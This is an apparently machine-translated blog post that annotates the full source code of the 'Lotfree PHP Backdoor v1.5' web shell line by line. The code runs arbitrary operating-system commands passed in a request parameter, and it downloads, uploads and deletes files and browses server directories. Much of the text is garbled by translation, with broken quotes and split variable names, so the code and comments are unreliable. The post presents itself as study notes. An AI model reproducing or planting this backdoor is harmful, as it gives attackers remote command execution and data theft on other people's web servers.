PHP Backdoor Version 1.5 is a PHP backdoor program written by Sirius_black/lotfree team, here for a brief analysis of it, but also as a self-learning PHP notes, the backdoor into the execution of the command, Depending on the user's permissions when installing the Web server and PHP, you can execute various operating system commands if you are an administrator. The following is a note for a backdoor program
-
-
- function Good_link ($link)
- {
- $link =ereg_replace ("/+", "/", $link);
- $link =ereg_replace ("/[^/(..)") +/\.\. ","/", $link);
- $link =ereg_replace ("/+", "/", $link);
- if (!strncmp ($link, "./", 2) && strlen ($link) >2) $link =substr ($link, 2);
- if ($link = = "") $link = ".";
- return $link;
- }
- $_request used to obtain the data submitted to this document
- $dir =isset ($_request[' dir '])? $_request[' dir ']: "."; If Dir,dir is not defined, the default value "."
- $dir =good_link ($dir);
- $rep =opendir ($dir); Open DIR-Specified path handle
- ChDir ($dir); Switch to DIR-specified directory
- if (Isset ($_request["]) &&$_request[" Down "]!=" ")//if the down is defined
- {
- Header ("Content-type:application/octet-stream");
- Header ("Content-length:". FileSize ($_request["Down"));
- Header ("content-disposition:attachment; Filename= ". BaseName ($_request[" Down "));
- ReadFile ($_request["Down"]); To read a file to a buffer
- Exit ();
- }
- ?>
- Lotfree PHP Backdoor v1.5, easy to trace network yeetrack.com
-
- echo "The current absolute path is: ". GETCWD (). "
\ n "; Gets the current absolute path
- echo "dir = ' $dir '
\ n ";
- echo "Current directory, file list!
\ n ";
- If you have entered a command to execute
- if (isset ($_request[' cmd ')) &&$_request[' cmd ']!= "")
- {
- echo "
\ n ";
- System ($_request[' cmd '); Executes the input command on the server, performs a result echo
- echo "
\ n ";
- }
- If you have already uploaded the file
- if (Isset ($_files["fic" ["Name"]) && isset ($_post["max_file_size"))//Get POST file, save to current directory
- {
- if ($_files["fic" ["Size"]<$_post["max_file_size"])//Determine if the file conforms to the size specification
- {
- if (Move_uploaded_file ($_files["fic"] ["Tmp_name"],good_link ("./". $_files["fic" ["Name"])))//Save temporary files to the current directory
- {
- echo "File saved successfully". Good_link ("./". $_files["fic" ["Name"]). "!
\ n ";
- }
- else echo "File upload failed:". $_files["FIC" ["Error"]. "
\ n ";
- }
- else echo "File too large (files exceeding size limit)!
\ n ";
- }
- if (Isset ($_request[' rm ')) &&$_request[' rm ']!= "")//if RM is defined, the specified file is deleted
- {
- if (unlink ($_request[' rm '))//unlink is a php delete file function
- echo "successfully deleted". $_request[' RM ']. "!
\ n ";
- else echo "Delete file failed
\ n ";
- }
- ?>
-
-
-
-
- $t _dir=array ();
- $t _file=array ();
- $i _dir=0;
- $i _file=0;
- The directory file before the loop is read, placed in T_dir and T_file
- while ($x =readdir ($rep))
- {
- if (Is_dir ($x))//If the directory is currently being processed
- $t _dir[$i _dir++]= $x;
- else//If the file is currently being processed
- $t _file[$i _file++]= $x;
- }
- Closedir ($REP); Close a directory handle opened by Opendir
- while (1)//loop to enter the directory and file for the current path
- {
- ?>
-
-
- if ($x =each ($t _dir))
- {
- $name = $x ["Value"]; Gets the directory name in the T_dir array
- if ($name = = '. ') {}
- ElseIf ($name = = ' ... ') echo "Up (parent directory)
\ n "; Show an up link to read the list of files in the parent directory
- Else
- echo "". $name. " \ n ";
- }
- ?>
|
|
- $_server[' php_self ' gets the current PHP script file name
- if ($y =each ($t _file))
- {
- if ($y ["Key"]%2==0)//If key is currently being processed
- echo "bgcolor= ' LightGreen ' >\n";
- else//If value is currently being processed, that is, the file. The file is displayed and a download link is provided.
- echo ">\n";
- echo "". $y ["Value"]. " \ n ";
- }
- else echo ">\n";
- ?>
|
- if ($y)
- {
- If this is a file, provide the following link to delete the file
- if ($y ["Key"]%2==0) echo "bgcolor= ' LightGreen '";
- echo ">Del";
- }
- else echo ">\n";
- ?>
- if (! $x &&! $y)
- Break
- }
- ?>
- ? dir= ">revenirau repertoire d ' Origine
-
- Upload file to server current directory:
Copy Code
|